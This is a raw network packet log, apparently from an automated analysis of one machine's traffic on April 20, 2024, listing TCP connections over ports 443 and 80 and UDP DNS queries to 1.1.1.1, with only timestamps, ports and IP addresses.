Apr 20, 2024 08:24:11.703964949 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.704154015 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.704154015 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.704195976 CEST	443	49759	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:11.704265118 CEST	49759	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:11.709590912 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.709758997 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.709836960 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.709904909 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.709922075 CEST	443	49760	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.709943056 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.709985971 CEST	49760	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.747484922 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.747744083 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.747773886 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.748245955 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.748697042 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.748775959 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.748877048 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.792211056 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.962749958 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.962810993 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:11.962877989 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.963979006 CEST	49762	443	192.168.2.4	74.125.136.154
Apr 20, 2024 08:24:11.963989019 CEST	443	49762	74.125.136.154	192.168.2.4
Apr 20, 2024 08:24:12.073216915 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.073288918 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.073371887 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.073936939 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.073971987 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.074532986 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.074554920 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.074619055 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.074790955 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.074806929 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.286509037 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.286783934 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.286809921 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.287725925 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.287803888 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.288105965 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.288172007 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.288243055 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.288250923 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.292268991 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.292613029 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.292654037 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.296191931 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.296271086 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.296681881 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.296822071 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.296839952 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.296870947 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.336596966 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.336745024 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.336802959 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.382577896 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.501908064 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.501965046 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.502027035 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.502666950 CEST	49768	443	192.168.2.4	64.233.177.157
Apr 20, 2024 08:24:12.502687931 CEST	443	49768	64.233.177.157	192.168.2.4
Apr 20, 2024 08:24:12.510060072 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.510276079 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.510356903 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.512387037 CEST	49767	443	192.168.2.4	142.250.105.104
Apr 20, 2024 08:24:12.512422085 CEST	443	49767	142.250.105.104	192.168.2.4
Apr 20, 2024 08:24:12.635884047 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.635970116 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.636123896 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.636945009 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.636981010 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.850912094 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.851326942 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.851345062 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.852793932 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.852863073 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.853312016 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.853394985 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.853521109 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.853534937 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:12.901066065 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:12.940915108 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:12.940989971 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:12.941092014 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:12.941279888 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:12.941310883 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.073985100 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:13.074184895 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:13.074362993 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:13.074805021 CEST	49769	443	192.168.2.4	64.233.185.147
Apr 20, 2024 08:24:13.074836016 CEST	443	49769	64.233.185.147	192.168.2.4
Apr 20, 2024 08:24:13.158916950 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.159208059 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.159235954 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.162797928 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.162870884 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.163306952 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.163429976 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.163436890 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.163479090 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.215289116 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.215310097 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.261374950 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.373480082 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.373606920 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.373670101 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.373709917 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.373737097 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.373790979 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.373823881 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.373976946 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.374042034 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.374057055 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.380296946 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.380354881 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.380372047 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.387612104 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.387702942 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.387712002 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.394987106 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.395071983 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.395081043 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.437139988 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.437163115 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.478245974 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.478522062 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.478552103 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.481966972 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:13.482249975 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.489058971 CEST	49772	443	192.168.2.4	172.253.124.106
Apr 20, 2024 08:24:13.489085913 CEST	443	49772	172.253.124.106	192.168.2.4
Apr 20, 2024 08:24:16.298887014 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.298969030 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.299046993 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.299388885 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.299412966 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.520752907 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.521054029 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.521091938 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.522310019 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.524215937 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.524415970 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.525738001 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.572139978 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.734703064 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.734894037 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.734977007 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.735366106 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.735367060 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:16.735413074 CEST	443	49776	216.239.38.181	192.168.2.4
Apr 20, 2024 08:24:16.735471964 CEST	49776	443	192.168.2.4	216.239.38.181
Apr 20, 2024 08:24:17.118726969 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:17.118927956 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:17.119004965 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:18.166076899 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.166115999 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:18.166662931 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.168927908 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.168966055 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:18.546904087 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:18.546983957 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.549252987 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.549279928 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:18.549685955 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:18.589576006 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.958637953 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:18.964878082 CEST	49723	80	192.168.2.4	199.232.214.172
Apr 20, 2024 08:24:18.997117996 CEST	49742	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:24:18.997195959 CEST	443	49742	172.253.124.147	192.168.2.4
Apr 20, 2024 08:24:19.004117012 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.068500996 CEST	80	49723	199.232.214.172	192.168.2.4
Apr 20, 2024 08:24:19.068520069 CEST	80	49723	199.232.214.172	192.168.2.4
Apr 20, 2024 08:24:19.068564892 CEST	49723	80	192.168.2.4	199.232.214.172
Apr 20, 2024 08:24:19.193429947 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193485975 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193506002 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193546057 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193559885 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.193582058 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193617105 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193649054 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.193672895 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.193702936 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193777084 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.193793058 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193926096 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.193991899 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.205436945 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.205468893 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:19.205495119 CEST	49777	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:19.205507994 CEST	443	49777	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:53.526922941 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:24:53.526978016 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:24:55.663516045 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:55.663598061 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:55.663872957 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:55.664091110 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:55.664144039 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.031538010 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.031627893 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.038028002 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.038054943 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.038520098 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.050435066 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.096123934 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.381951094 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.382009029 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.382055044 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.382230997 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.382230997 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.382294893 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.382335901 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.382364988 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.382390976 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.382435083 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.389132977 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.389132977 CEST	49782	443	192.168.2.4	20.12.23.50
Apr 20, 2024 08:24:56.389194965 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:24:56.389231920 CEST	443	49782	20.12.23.50	192.168.2.4
Apr 20, 2024 08:25:06.818617105 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:06.818706036 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:06.818856001 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:06.819106102 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:06.819129944 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:07.039422989 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:07.039732933 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:07.039794922 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:07.041306973 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:07.041656971 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:07.042083025 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:07.082592010 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:07.653084993 CEST	49724	80	192.168.2.4	199.232.214.172
Apr 20, 2024 08:25:07.757167101 CEST	80	49724	199.232.214.172	192.168.2.4
Apr 20, 2024 08:25:07.757251024 CEST	80	49724	199.232.214.172	192.168.2.4
Apr 20, 2024 08:25:07.757318974 CEST	49724	80	192.168.2.4	199.232.214.172
Apr 20, 2024 08:25:08.985718966 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:25:08.985919952 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:25:08.986296892 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:25:08.986327887 CEST	443	49745	5.9.123.217	192.168.2.4
Apr 20, 2024 08:25:08.992196083 CEST	49745	443	192.168.2.4	5.9.123.217
Apr 20, 2024 08:25:17.053788900 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:17.053916931 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:25:17.053975105 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:18.997297049 CEST	49784	443	192.168.2.4	172.253.124.147
Apr 20, 2024 08:25:18.997366905 CEST	443	49784	172.253.124.147	192.168.2.4
Apr 20, 2024 08:26:06.978029013 CEST	49786	443	192.168.2.4	74.125.136.106
Apr 20, 2024 08:26:06.978069067 CEST	443	49786	74.125.136.106	192.168.2.4
Apr 20, 2024 08:26:06.978305101 CEST	49786	443	192.168.2.4	74.125.136.106
Apr 20, 2024 08:26:06.978585005 CEST	49786	443	192.168.2.4	74.125.136.106
Apr 20, 2024 08:26:06.978625059 CEST	443	49786	74.125.136.106	192.168.2.4
Apr 20, 2024 08:26:07.197810888 CEST	443	49786	74.125.136.106	192.168.2.4
Apr 20, 2024 08:26:07.198173046 CEST	49786	443	192.168.2.4	74.125.136.106
Apr 20, 2024 08:26:07.198199987 CEST	443	49786	74.125.136.106	192.168.2.4
Apr 20, 2024 08:26:07.198879004 CEST	443	49786	74.125.136.106	192.168.2.4
Apr 20, 2024 08:26:07.200504065 CEST	49786	443	192.168.2.4	74.125.136.106
Apr 20, 2024 08:26:07.200757027 CEST	443	49786	74.125.136.106	192.168.2.4
Apr 20, 2024 08:26:07.245452881 CEST	49786	443	192.168.2.4	74.125.136.106

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 08:24:02.444825888 CEST	54606	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:02.444952011 CEST	63724	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:02.540288925 CEST	53	49535	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:02.773473978 CEST	53	64790	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:02.794734001 CEST	53	54606	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:03.161039114 CEST	53	63724	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:03.349505901 CEST	52443	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:03.371162891 CEST	53	52991	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:03.951672077 CEST	53	52443	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:06.757318974 CEST	55391	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:06.757581949 CEST	63541	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:06.861747980 CEST	53	55391	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:06.862077951 CEST	53	63541	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:09.287770987 CEST	53	64183	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:09.362991095 CEST	54329	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:09.363733053 CEST	62420	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:09.375439882 CEST	55785	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:09.375808001 CEST	54679	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:09.467430115 CEST	53	54329	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:09.468760014 CEST	53	62420	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:09.482430935 CEST	53	54679	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:09.482659101 CEST	53	55785	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:10.028343916 CEST	53	51932	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:10.293241978 CEST	53	62370	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:10.338191986 CEST	64435	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:10.338463068 CEST	53833	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:10.343369961 CEST	56852	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:10.343497992 CEST	52598	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:10.442657948 CEST	53	64435	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:10.442827940 CEST	53	53833	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:10.449830055 CEST	53	56852	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:10.450257063 CEST	53	52598	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.097042084 CEST	52423	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.097253084 CEST	64011	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.170840025 CEST	60243	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.171030998 CEST	51338	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.171960115 CEST	50710	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.172269106 CEST	61786	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.201663971 CEST	53	52423	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.207736969 CEST	53	64011	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.275240898 CEST	53	60243	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.275732040 CEST	53	51338	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.276312113 CEST	53	50710	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.277124882 CEST	53	61786	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.287930965 CEST	53	61741	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.637231112 CEST	53	58089	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.804132938 CEST	53	56190	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:11.968075991 CEST	64602	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.968202114 CEST	61825	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.969780922 CEST	56375	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:11.969923019 CEST	64815	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:12.072226048 CEST	53	64602	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.072360039 CEST	53	61825	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.074040890 CEST	53	56375	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.074084044 CEST	53	64815	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.529021978 CEST	59717	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:12.529289007 CEST	61116	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:12.634907007 CEST	53	59717	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.635194063 CEST	53	61116	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.835516930 CEST	52400	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:12.835649967 CEST	57907	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:24:12.940186977 CEST	53	52400	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.940233946 CEST	53	57907	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:12.975142956 CEST	53	56818	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:13.373100042 CEST	53	55684	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:19.220164061 CEST	138	138	192.168.2.4	192.168.2.255
Apr 20, 2024 08:24:20.358014107 CEST	53	53079	1.1.1.1	192.168.2.4
Apr 20, 2024 08:24:39.351341009 CEST	53	64511	1.1.1.1	192.168.2.4
Apr 20, 2024 08:25:01.913397074 CEST	53	52623	1.1.1.1	192.168.2.4
Apr 20, 2024 08:25:02.183235884 CEST	53	64055	1.1.1.1	192.168.2.4
Apr 20, 2024 08:25:29.757236004 CEST	53	65076	1.1.1.1	192.168.2.4
Apr 20, 2024 08:26:06.871956110 CEST	57858	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:26:06.872155905 CEST	62713	53	192.168.2.4	1.1.1.1
Apr 20, 2024 08:26:06.976902962 CEST	53	62713	1.1.1.1	192.168.2.4
